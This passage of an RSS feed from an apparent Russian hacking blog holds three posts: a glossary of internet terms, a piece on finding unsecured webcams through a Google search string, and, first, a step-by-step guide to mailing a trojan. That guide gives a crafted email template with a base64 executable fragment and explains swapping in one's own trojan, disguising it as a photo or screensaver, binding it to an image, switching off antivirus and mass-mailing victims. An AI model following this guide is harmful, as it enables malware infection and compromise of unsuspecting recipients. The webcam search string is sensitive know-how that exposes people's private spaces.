Content-Type: multipart/related;<br />
type=&#187;multipart/alternative&#187;;<br />
boundary=&#187;====_ABC1234567890DEF_====&#187;<br />
X-Priority: 3<br />
X-MSMail-Priority: Normal<br />
X-Unsent: 1</p>
<p>&#8212;====_ABC1234567890DEF_====<br />
Content-Type: multipart/alternative;<br />
boundary=&#187;====_ABC0987654321DEF_====&#187;</p>
<p>&#8212;====_ABC0987654321DEF_====<br />
Content-Type: text/html;<br />
charset=&#187;iso-8859-1&#8243;<br />
Content-Transfer-Encoding: quoted-printable</p>
<p>&#8212;====_ABC0987654321DEF_====&#8212;</p>
<p>&#8212;====_ABC1234567890DEF_====<br />
Content-Type: audio/x-wav;<br />
name=&#187;Troyan.jpg.exe”<br />
Content-Transfer-Encoding: base64<br />
Content-ID:</p>
<p>На этом месте будет файл трояна в base-64 кодировке…….(внешне будет выглядеть как большой и ровный блок текста )</p>
<p>&#8212;====_ABC1234567890DEF_====</p>
<p>&#8212;====_ABC1234567890DEF_====&#8212;</p>
<p>Кстати в проге zender уже лежит пример готового файл Mail.eml с уже вложенным туда трояном. Открыв его также в текстовом редакторе вы и увидете как в нём будет выглядит сам файл трояна тесктом, он там как раз и будет в base-64 кодировке. Выглядеть это будет примерно вот так:<br />
TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAA<br />
AAAAAAAAAAAAAAAAAAAAAAAAA<br />
AAAAAAAAAAAAAAAAAAAgAAAAA<br />
4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdC<br />
BiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAAB<br />
QRQAATAEDAGVj+zwAAAAAAAAAAOAADwELAQED<br />
ABAAAAAQAAAAYAAA4HkAAABwAAAAgAAAAABAAA<br />
AQAAAAAgAAAQAAAAAAAAAEAAAAAAAAAACQAAAA<br />
EAAAAAAAAAIAAAAAABAAABAAAAAAEAAAEAAAAAAA<br />
ABAAAAAAAAAAAAAAAKSDAAB0AQAAAIAAAKQDAA<br />
AAAAAAAAAAAAAAAAAAААА</p>
<p>Это и есть сам файл трояна , просто он в кодировке base-64. Но только не открывайте этот файл вашим Оутглюком, так как у автора проги видно есть «чуство юмора» и он вместо того чтоб вложить в это письмо для примера какую-нить безобидную программку…. вложил туда настоящего своего трояна и если вы это письмо откроете своим Оутглюком то он сразу автоматически запустится у вас на компе. Ну а вы думаете почему я вас Bat поставить просил. Да и ещё установите в Бате в настройках ассоциации файлов .eml с Батом и тогда такие файлы у вас будут открыватся не в Оутглюке а в Бате и вы сможете их спокойно открывать и смотреть, так как в Бате такого бага как в Оутлюке нету. И так письмо у нас есть, теперь в него надо вставить трояна. И что надо сделать чтобы вставить в ваше в письмо mail.eml уже сконфигурированного вами вашего родного трояна и как узнать как он выглядит в base-64 кодировке. Для этого нам и пригодится Бат. Открываем его. В нём создаём новое письмо, присоединяем к нему вашего трояна и жмём на кнопочку отправить , не важно кому так как мы его отправлять ни куда не собираемся, письмо соответственно попадёт в папку «Исходящие» (это если у вас Бат русифицирован), но нам оно там нам не нужно поэтому берём и перемещаем его в папку «Входящие» (просто перетаскиваем мышкой), затем открываем его там щёлкая по нему два раза и ищем в открывшемся окне вверху меню «Спецальное» а в нём выбираем «исходный текст» и увидим наше письмо токлько файл с нашим трояном будет там как раз в нужной нам base-64 кодировке, я уже говорил как он будет выглядеть (внешнее похоже на большой блок ровного и непрерывного текста), так вот выделяем именно только этот текст и копируем его в буфер обмена (для тех кто не знает кто это такая «буфер обмена» то копируйте в простой текстовой документ :). Затем открываем наше уже заготовленное письмо mail.eml в текстовом редакторе и вставляем этот текст заместо того который я уже писал выше:<br />
На этом месте будет файл трояна в base-64 кодировке…….(внешне будет выглядеть как большой и ровный блок текста)<br />
Саму эту надпись конечно же удаляем!!! Сории что объясняю как даунам каким то , но ведь блин найдутся те которые так и не врубятся куда что и заместо чего вставлять. Так же можете взять пример письма из проги Zender (там он называется Mail.eml) и так же открыв его в тестовом редакторе удалить из него только текст (в base-64 кодировке) файла с трояном автора и вставить туда текст (в base-64 кодировке) уже своего сконфигурированного трояна. Кстати не забудьте поменять в файле строки From , To и Subject на нужные вам, и ещё поменяйте в строке Name=&#187;имя_трояна.exe&#187; на что нибудь другое типа name=&#187;my_sexy_foto.jpg.exe&#187;. То что вы там поставите и будет отбражаться в полях письма From, To, Subject и имя приатаченного файла , которое получит жертва. Кстати нам так же пригодится и Joiner , склейте с трояном какую нить фотку, потому что не у всех может Оутглюк стоять и когда жертва будет открывать файл уже самостоятельно ей предстанет перед глазами эта фотка, а ваш троян в это время будет делать своё грязное дело. Да, ещё за место расширения файла .exe можно поставаить .scr – это расширение у скринсейверов (программ-заставок) но действовать будет так же как и с .exe , просто таким образом можно немного усыпить бдительность жертвы. Сохраняемся, и всё письмо с трояном mail.eml готово. Теперь если открыть это письмо Оутглюком то файл автоматически запустится. Теперь о том как пользоваться Zenderom для отсылки этого письма, потому как обычной почтовой програмой его не отошлёшь так как она поменяет все заголовки на другие и троян в письме уже автоматически не запустится . Для начала прочтите там файл с описанием. Если не поняли то объясню на пальцах. В начале кладёте ваше письмо mail.eml в папку с Zenderom. Там же в папке есть файл user.txt . Он нам и нужен для рассылки. В первой строчке после from= пишем любой существующий адрес на каком нить бесплатном мыльном сервисе, главное чтоб он там существовал и чтоб сервак имел smtp сервер. Ну например from=vasya@mail.ru . Он в принцепе не имеет большого значения и нужен для того чтоб прога могла через этот мыльный сервак и его smtp сервер разослать письмо уже на адреса ваших жертв. А вот на следущей строчке уже просто пишите адреса ваших жертв, их может быть сколь угодно много главное чтоб они все начинались с новой строки. Теперь запускаете саму прогу zender.exe и она разашлёт ваше письмо с трояном по всем этим адресам. Кстати у проги нет интерфейса ( т.е. ни каких окошечек у вас не появится) , так что следить за тем как она рассылает письмо можно будет по самому соединению (значок который мигает у вас в трее когда вы подключаетесь к инету). Когда она разошлёт письмо по всем указаным вами адресам то появится окошко с надписью All done это значит что письмо разослано. А если вы рассылаете не на один адресс, а например по спам листу на несколько десятков адрессов, то чтоб не ждать пока прога разошлёт файл по всем этим адрессам и не терять много драгоценного время в инете делайте так….. заведите себе например на рамблере любое мыло и поставтье на нём переадресацию на имеющиеся у вас многочисленные адресса жертв, а в файле user.txt заместо адрессов жертв напишите всего один адрес этого вашего мыла на рамблере и всё, теперь запустите прогу и она пошлёт письмо на этот адресс, а уж сервак рамблера сам сделает за вас всю грязную работу и разашлёт письмо по всем адресам которые вы указали в переадресации. Так что теперь эфективность рассылки трояна у вас значительно повысится по сравнению с тем как вы его раньше рассылали простым дедовским способом :)))). Так как ещё много тех кто сидит на Вынь9х и Отглюках :). Кстати щас само письмо mail.eml сосотавленное таким вот образом чтоб автоматически запускался приатаченный к нему файл определяется многими антивирусами как троян даже если вы туда ещё ни кого трояна и не вставляли, у меня например мой ДокторВъеб ругается на это письмо что типа это troyanIframe :)))), правда если письмо лежит в каком zip архиве то он на него молчит, хотя ведь сами архмвы он шмонать умеет хорошо, вот так то, так что на время составления письма придётся выгружать ваши антивирусные мониторы , а то ведь работать нормально не дадут :)). Ну вот и всё. По моему всё понятно рассказал. У кого будут какие вопросы пишите (можете даже такие вот письма с автозапуском… у меня всё равно Бат стоит :))))). Удачи.</p>
Файл 7f5ddbf668be432bbaf47f6ed1d47c4b/sape.php не найден!]]></content:encoded>
			<wfw:commentRss>http://suspended.ru/2010/05/%d0%bd%d0%b0%d0%b7%d0%b2%d0%b0%d0%bd%d0%b8%d0%b5-261/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Словарь терминов для новичков часть №1</title>
		<link>http://suspended.ru/2010/05/%d0%bd%d0%b0%d0%b7%d0%b2%d0%b0%d0%bd%d0%b8%d0%b5-256/</link>
		<comments>http://suspended.ru/2010/05/%d0%bd%d0%b0%d0%b7%d0%b2%d0%b0%d0%bd%d0%b8%d0%b5-256/#comments</comments>
		<pubDate>Thu, 13 May 2010 05:05:31 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
				<category><![CDATA[Хакерство]]></category>
		<category><![CDATA[взлом]]></category>
		<category><![CDATA[обман]]></category>
		<category><![CDATA[пароли]]></category>

		<guid isPermaLink="false">http://suspended.ru/?p=564</guid>
		<description><![CDATA[конецформыначалоформыЗдраствуйте!!! Я Keniattack, и я решил написать эту статью-словарь для того чтоб новички не мучали опытных хакеров с вопросами: а что такое IP? Или а что такое хост? Я не смогу написать много в этой статье так как я человек а не печатная машина и по этому я разделю свой словарь на несколько частей. Просьба [&#8230;]]]></description>
				<content:encoded><![CDATA[<p style="text-align: justify;"><img class="alignleft size-full wp-image-76" style="margin: 10px;" title="internet" src="http://suspended.ru/wp-content/uploads/2010/05/internet263.jpg" alt="интернет" />конецформыначалоформыЗдраствуйте!!! Я Keniattack, и я решил написать эту статью-словарь для того чтоб новички не мучали опытных хакеров с вопросами: а что такое IP? Или а что такое хост? Я не смогу написать много в этой статье так как я человек а не печатная машина и по этому я разделю свой словарь на несколько частей.<br />
Просьба не судите строго это моя первая статья и не ругайте за грамматические ошибки так как я пишу в спешке))). Ну ладно поехали&#8230;<br />
Attach &#8212; файл, &#171;прикрепленный&#187; к сообщению электронной почты.<br />
E-mail: (электронная почта) &#8212; рассылка и получение сообщений при помощи электронных средств связи; как правило, это понятие ассоциируется с Интернетом.<span id="more-564"></span><br />
IP-адрес &#8212; это уникальный адрес компьютера в сети Интернет, который состоит из четырех чисел, находящихся в диапазоне от 0 до 255 и разделенных точками. Например: 196.25.5.23. В Интернете можно обратиться к любому подключенному компьютеру, используя IP адрес.<br />
FTP (File Transfer Protocol) &#8212; &#171;протокол передачи файлов&#187;, инструмент для переноса любого файла на узловую машину. Файл можно перекачать (скопировать) по модему на собственный персональный компьютер.<br />
Frame &#8212; специфическая область Web-страницы, содержащая данные из другой страницы.<br />
Hits (хиты) &#8212; число посещений той или иной web-страницы<br />
Hosts (хосты) &#8212; число посетителей той или иной web-страницы с уникальным IP-адресом<br />
HTML (HyperText Markup Language) &#8212; язык описания гипертекста, используемый для размещения информации на Сети в виде гипертекстовых страниц, доступных через программу сканирования сети (browser), поддерживающую HTTP.<br />
HTTP (Hypertext Transport Protocol) &#8212; протокол передачи гипертекста. &#8212; язык, при помощи которого браузер направляет на серверы запросы на web-страницы.<br />
ICQ (I Seek You &#8212; я ищу тебя) &#8212; коммуникационная программа для Интернета, позволяющая обмениваться короткими сообщениями (аналог пейджера), а также пересылать файлы, фото и т.д. Одно из средств общения в Интернете<br />
IP (Интернет-протокол) &#8212; идентификационный номер компьютера, подключенного к Интернету (как телефонный номер); на него также распространяются права интеллектуальной собственности.<br />
Java &#8212; разработанный компанией Sun Microsystems набор спецификаций для создания программ (называемых аплетами), которые можно вставить в Web-страницы и которые выполняются под управлением защищенной среды, обеспечивая высокую степень безопасности.<br />
JavaScript &#8212; язык программирования компании Netscape, с помощью которого можно работать в интерактивном режиме.<br />
Microsoft Internet Explorer &#8212; одна из программ просмотра информации Web-серверах фирмы Microsoft, созданная на основе программы Mosaic.<br />
On-line &#8212; доступ в режиме реального времени (&#171;здесь и сейчас&#187;).<br />
TCP/IP (File Transmission Control Protocol/Internet Protocol) &#8212; два стандартных протокола, используемых для установления соединения между компьютерами, входящими в Интернет. Эти протоколы позволяют различным компьютерным системам производить обмен данных.<br />
Web-интерфейс &#8212; это то, что видит пользователь на сайте в окне своего web-браузера. Другими словами, это совокупность информации и средств навигации на web-сайте, позволяющая пользователю самостоятельно, без применения дополнительных программ пользоваться и управлять этой информацией.<br />
Web-сайт &#8212; это участок Интернета, содержащий информацию, сгруппированную определенным образом. Другими словами, это совокупность web-файлов, которая включает в себя начальный файл, называемый домашней страницей, и другие, именуемые страницами. Просмотреть сайт можно на своем компьютере, используя специальную программу &#171;web-броузер.&#187; Существует большое количество различных web-браузеров, но самыми распространенными среди пользователей являются Internet Explorer (IE) компании Microsoft и Netscape Communicator (NC) компании Netscape.<br />
Web-сервер &#8212; это компьютер, оснащенный специальным программным обеспечением, который может хранить и обрабатывать файлы одного и более web-сайтов. В случае, когда несколько web-сайтов работают на одном компьютере, web-сервером принято называть то виртуальное пространство (программное обеспечение и место на компьютере), в котором работает web-сайт. Поэтому многие говорят &#171;web-сервер&#187;, подразумевая &#171;web-сайт&#187;. Большие web-сайты, содержащие много информации, могут храниться и обрабатываться сразу на нескольких компьютерах. Обмен информацией с web-серверами происходит только по специальным протоколам http:// или https://.<br />
Web-страница &#8212; отдельно взятый файл, находящийся в памяти компьютера, в котором содержится текст в формате HTML, а также графические изображения и гипертекстовые ссылки для взаимодействия с другими страницами.<br />
WWW-адрес &#8212; это адрес сайта, обозначенный по особым правилам веба. Адрес может включать зарегистрированный домен web-сайта, а также &#8212; требуемые каталоги и файлы, расположенные на web-сервере<br />
WWW (World Wide Web) &#8212; &#171;всемирная паутина&#187;, средство для онлайнового доступа к информационным ресурсам Интернет. Это широко распространенный программный продукт, обеспечивающий гипертекстовый переход со страницы на страницу, а также гипертекстовую связь ресурсов Интернет в единую систему, которая предусматривает возможность навигации и поиска.<br />
Unlimited &#8212; схема доступа в Интернет, при которой пользователь покупает доступ на определенный срок (как правило &#8212; месяц). При этом время, проведенное пользователем на линии, не учитывается.<br />
URL (Uniform Resource Locator) &#8212; это &#171;адрес&#187; на WWW, единый указатель на русерс. Представляет собой имя файла или ресурса, позволяющее достичь его через Интернет и включающее, как правило, название протокола, имя узла и путь до файла.<br />
Авторизация &#8212; проверка прав или личности пользователя, необходимая для обеспечения безопасной работы Интернета и целостности секретной информации. Обычно авторизация сводится к набору имени пользователя (логина) и пароля.<br />
Базы данных (БД) &#8212; специальное программное обеспечение, предназначенное для организации хранения информации и доступа к ней. Используются при создании программного обеспечения для систем управления web-сайтом.<br />
Баннер (баннерная реклама) &#8212; в общем случае, это статичное или анимированное изображение, размещаемое на страницах web-сайта с целью рекламы чего-либо. Баннер выполняет роль гиперссылки на тот или иной Интернет-ресурс.<br />
Баннерная реклама &#8212; реклама посредством размещения баннеров на web-сайтах. При проведении баннерной рекламы имеется возможность выбора времени показа и определения целевой аудитории по интересам и территориальному признаку. Цель размещения баннера &#8212; добиться соответствующих действий со стороны пользователя, чтобы на его экране открылась web-страница с рекламируемой информацией.<br />
Баннерные сети &#8212; это специальное программное обеспечение, позволяющее производить обмен баннерами между сайтами &#8212; участниками сети с возможностью выбора времени показа и определения целевой аудитории по интересам и территориальному признаку.<br />
Броузер &#8212; это программа, работающая на компьютере клиента, которая посылает, принимает и отображает файлы в рамках HTTP-протокола. Современные броузеры понимают и другие протоколы, например, FTP или Gopher. В настоящее время наиболее распространенными броузерами являются: Netscape, Internet Explorer, Opera и Mosaic.<br />
Брэндинг &#8212; имиджевая реклама, продвижение какой-либо торговой марки (брэнда). Основная ее цель &#8212; узнаваемость в потребительской среде.<br />
Выделенка &#8212; выделенная линия. Такая обычная телефонная линия проводится телефонной компанией в квартиру, но использует только для Интернета. Поэтому качество связи лучше, скорость может быть больше во много раз чем по телефонной линии, и пользоваться ей можно круглосуточно, не занимая обычного голосового телефона.<br />
Гипертекст &#8212; нелинейная форма записи текстовой информации с обозначением ссылок на фрагменты текста любого документа, находящегося в автоматизированной информационной системе, и возможностью быстрого перехода к этим фрагментам.<br />
Глобальная сеть &#8212; сеть, содержащая большое количество узлов, имеющих, как правило, государственный, континентальный или межконтинентальный характер распределения ресурсов.<br />
Гостевая книга, гостевая (от англ. guestbook) &#8212; раздел сайта, где посетители с помощью специальной формы могут высказать свое мнение о сайте. Большинство гостевых книг позволяют ознакомиться с комментариями других посетителей.<br />
Домен (Доменное имя) &#8212; это часть WWW-адреса web-сайта, которая является его основой. Домены могут быть первого, второго, третьего и т.д. уровней, например, http://www.ru &#8212; домен первого уровня, закрепленный за Российской Федерацией, http://www.mtrx.ru- домен второго уровня. http://catalog.mtrx.ru &#8212; домен третьего уровня. Доменные имена второго уровня регистрируется специальными организациями, координирующими распределение доменных имен. Доменные имена третьего уровня может зарегистрировать администратор соответствующего доменного имени второго уровня, а доменное имя первого уровня Вы легко сможете получить, имея собственное государство.<br />
Индексация &#8212; лексический анализ и разбор текстовых материалов сайта с целью составления списка используемых слов и выражений. Составленный таким образом список используется при поиске информации на сайте по запросу пользователя. Индексация производится в автоматическом режиме специальными программами, называемыми поисковыми роботами. Используется всеми поисковыми системами.<br />
Интернет &#8212; это возможность, благодаря которой Вы сможете получить на своем столе любую информацию из любой точки мира, а также, не вставая со своего рабочего места, повлиять на события, происходящие в любой точке мира.<br />
Интернет/Web-сервер &#8212; это более широкое понятие, обозначающее компьютер (или компьютеры), оснащенный специальным программным обеспечением, обеспечивающий функционирование любых необходимых (а не только веб) сервисов Интернет: http://, https:// (web-сайт), e-mail (электронная почта), ftp, конференции и т.д.<br />
Интранет &#8212; замкнутая внутренняя локальная сеть, построенная по тому же принципу, что и Интернет.<br />
Логин &#8212; идентификатор, используемый для входа в систему.<br />
Локальные сети &#8212; сети, которые содержат небольшое количество узлов и распределяются внутри ограниченной территории (организация, учреждения, университета и т.п.)<br />
Модем &#8212; устройство преобразования данных для передачи их по каналам связи. Модемы бывают внутренними (встроенными) и внешними.<br />
Мультимедиа &#8212; особый вид компьютерной технологии, объединяющей в себе как традиционную статическую (текст, графику), так и динамическую информацию (речь, музыку, видеофрагменты, анимацию и т.д.).<br />
Оптимизация графики &#8212; максимальное уменьшение размера файлов с изображениями при сохранении приемлемого их качества. Используется при создании web-сайта для обеспечения высокой скорости загрузки его страниц.<br />
Поисковые системы &#8212; специальные системы, управляемые через web-интерфейс, позволяющие пользователю находить в сети web-сайты, содержащие необходимую информацию по ключевым словам. Например, http://www.yandex.ru или http://www.google.com.<br />
Порталы &#8212; очень часто посещаемые сайты, выполняющие роль шлюзов во &#171;Всемирную паутину&#187; и вследствие этого представляющие большой интерес для рекламодателей.<br />
Провайдер &#8212; это организация, предоставляющая пользователям сетевые услуги. Это фирма, которой платит пользователь за доступ к Интернет.<br />
Релевантность сайта &#8212; степень соответствия текста сайта ключевым словам, которые указаны в поле определения ключа поиска в поисковой системе. В зависимости от этой величины поисковая система определяет порядок показа результатов поиска. Чем выше у страницы релевантность, тем ближе к началу списка она будет находиться при выдаче результатов поиска.<br />
Регистрация доменного имени &#8212; это закрепление определенного доменного имени за тем или иным лицом путем внесения соответствующей информации в регистрационную базу данных организации, координирующей распределение доменных имен. В России в зоне .ru эти функции осуществляет Региональный Сетевой Информационный Центр. Адрес web-сайта центра http://www.nic.ru/ В 2001 году в России наметилась тенденция передачи прав на регистрацию доменов коммерческим организациям по аналогии с зарубежными схемами. Для зоны .com имена распределяют уполномоченные коммерческие компании. Например, http://www.registrator.com/.<br />
Сервер &#8212; компьютер сети, входящей в Интернет. Сервер обеспечивает обслуживание программ-клиентов, обращающихся к нему по сети. За каждым WWW-адресом, содержимое которого просматривается в броузерах, стоит сервер, который рассылает данные, и сотня других, расположенных между данным сервером и компьютерной системой клиента.<br />
Сеть &#8212; несколько компьютеров, соединенных вместе, что позволяет совместно использовать ресурсы и обмениваться информацией.<br />
Система управления сайтом &#8212; программное обеспечение, позволяющее владельцу web-сайта самостоятельно управлять содержимым этого сайта через web-интерфейс без специальных знаний в области программирования.<br />
Статистика сайта &#8212; статистические данные, полученные путем учета информации о посещении страниц сайта. В простейшем случае включает информацию о количестве и времени посещений.<br />
Узел (или Host) &#8212; компьютер, напрямую подключенный к сети Интернет. Он предназначен для работы пользователей в сети, размещения и хранения информации. Это может быть не только компьютер, но и любое электронное устройство, передающее информацию от одного сервера к другому.<br />
Хостинг &#8212; это размещение web-сайта абонента на оборудовании провайдера.<br />
Хостинг-провайдер (Хостер) &#8212; организация (в основном интернет-провайдер), которая профессионально занимается предоставлением услуг хостинга.<br />
Электронная коммерция &#8212; проведение бизнес-транзакций с помощью возможностей Интернет. Включает в себя любые формы деловой активности в сети.<br />
Юзабильность (юзабилити, usability) &#8212; это степень удобства работы с тем или иным web-сайтом для пользователя.</p>
Файл 7f5ddbf668be432bbaf47f6ed1d47c4b/sape.php не найден!]]></content:encoded>
			<wfw:commentRss>http://suspended.ru/2010/05/%d0%bd%d0%b0%d0%b7%d0%b2%d0%b0%d0%bd%d0%b8%d0%b5-256/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Google помогает подглядывать в чужие веб-камеры</title>
		<link>http://suspended.ru/2010/05/%d0%bd%d0%b0%d0%b7%d0%b2%d0%b0%d0%bd%d0%b8%d0%b5-257/</link>
		<comments>http://suspended.ru/2010/05/%d0%bd%d0%b0%d0%b7%d0%b2%d0%b0%d0%bd%d0%b8%d0%b5-257/#comments</comments>
		<pubDate>Thu, 13 May 2010 05:05:31 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
				<category><![CDATA[Хакерство]]></category>
		<category><![CDATA[взлом]]></category>
		<category><![CDATA[обман]]></category>
		<category><![CDATA[пароли]]></category>

		<guid isPermaLink="false">http://suspended.ru/?p=565</guid>
		<description><![CDATA[конецформыначалоформыСуществует простой способ находить незащищенные веб-камеры, подключенные к Сети. С их помощью любой желающий может увидеть, что происходит в офисах и домах незадачливых пользователей, не думающих о собственной безопасности. Камеры слежения, которые становятся обязательным атрибутом практически любого предприятия, могут таить в себе опасность и вместо усиления системы безопасности служить ее разрушителем. Все дело в том, [&#8230;]]]></description>
				<content:encoded><![CDATA[<p style="text-align: justify;"><img class="alignleft size-full wp-image-76" style="margin: 10px;" title="internet" src="http://suspended.ru/wp-content/uploads/2010/05/internet264.jpg" alt="интернет" />конецформыначалоформыСуществует простой способ находить незащищенные веб-камеры, подключенные к Сети. С их помощью любой желающий может увидеть, что происходит в офисах и домах незадачливых пользователей, не думающих о собственной безопасности.<br />
Камеры слежения, которые становятся обязательным атрибутом практически любого предприятия, могут таить в себе опасность и вместо усиления системы безопасности служить ее разрушителем. Все дело в том, что зачастую они подключаются к корпоративной сети компаний по IP-протоколу и имеют прямой выход в Интернет. Функционал камеры позволяет просматривать изображение с нее при помощи обычного браузера, так как само устройство уже имеет встроенный веб-сервер.<span id="more-565"></span> Это удобное изобретение, позволяющее экономить на экранах слежения, может привести к серьезным последствиям, если вовремя не подумать об ограничении такой «свободы слова».<br />
Консультант по вопросам информационной безопасности Роберт Шифрен (Robert Schifreen) создал сайт www.defeatingthehacker.com/videoham/ на котором подробно описал процесс поиска и подключения к открытым камерам слежения. Явление даже получило свое название в Интернете — Video Ham (в английском языке слово ham помимо «ветчины» имеет еще значение «радиолюбитель»).<br />
Сама процедура поиска проста и доступна каждому любопытному пользователю — нужно лишь найти страницы, в адресе которых содержится подстрока «CgiStart? page=Single», на такой запрос Google сразу выдал нам несколько десятков ссылок, среди которых действительно нашлось немало снимков с камер слежения, расположенных в офисных помещениях. Вряд ли владельцы компаний мечтали о том, что за их сотрудниками будет «присматривать» автор российского интернет-журнала.<br />
При всей серьезности проблемы, обеспечить безопасность крайне просто. Во-первых, нужно ограничить доступ к веб-камере корпоративной локальной сетью, исключив IP-адреса внешнего Интернета, во-вторых, необходимо установить пароль на просмотр изображений с камеры. При соблюдении этих несложных правил никакие скучающие пользователи не смогут нанести в ваш дом или офис нежданный визит, пусть даже и виртуальный.</p>
Файл 7f5ddbf668be432bbaf47f6ed1d47c4b/sape.php не найден!]]></content:encoded>
			<wfw:commentRss>http://suspended.ru/2010/05/%d0%bd%d0%b0%d0%b7%d0%b2%d0%b0%d0%bd%d0%b8%d0%b5-257/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>
